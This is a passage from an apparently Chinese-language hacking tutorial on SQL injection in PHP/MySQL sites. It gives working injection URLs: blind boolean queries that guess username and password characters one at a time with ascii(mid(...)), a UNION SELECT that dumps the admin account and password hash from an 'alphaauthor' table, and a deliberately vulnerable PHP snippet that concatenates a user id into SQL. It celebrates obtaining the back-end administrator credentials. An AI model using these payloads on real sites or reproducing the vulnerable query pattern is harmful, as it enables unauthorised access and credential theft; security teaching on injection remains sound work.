|
跟上面差不多啦,判断password字段的长度 下面进入猜密码的阶段,用ascii方法来一位一位猜测吧。Ascii等同于asp下的asc,哈哈,经常看黑客X档案的一定很清楚啦。 http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,1,1))=97) 用户名第一位哦ascii97就是字符a啦 http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,2,1))=108)
第二位啦,这里只放这一个图啦,如图(12)
下面省略X条。
反正我们最后是得出用户名和密码了。
我们会发现这里的注入方法几乎和asp下的注入是一样的,就是把asc变成ascii,把len变成length就可以了,最后我们就可以得到后台的管理员账号和密码,
当然我们有更简单的方法,可以直接用union的方法直接得到
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor 如图(13) 账号是alpha,密码是一长串的东东,哈哈,简单明了,看到没有,这里显示出了union select的强大威力了吧。 上面讲的是在不通的表里面猜测内容,如果在同一个表里面我们还可以像下面这样哩:
下面的一段代码根据用户id显示用户信息 以下是引用片段:
<?php
//user.php
………..
$sql = "SELECT * FROM user WHERE id=$id";
…………
if (!$result)
{
echo "wrong";
exit;
}
else
echo "用户信息";
?> |
猜测方法和上面几乎是一样的,就是我们不用再用select了。
我们输入
http://localhost/user.php?id=1 and length(password)=7 显示用户信息说明我们猜的正确,呵呵,comeon http://localhost/user.php?id=1 and ascii(mid(password,1,1))=97
第一位密码 http://localhost/user.php?id=1 and ascii(mid(password,2,1))=97
第二位哦, 通过这种方法最终我们也可以得出id=1的用户的账号密码 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] 下一页 |
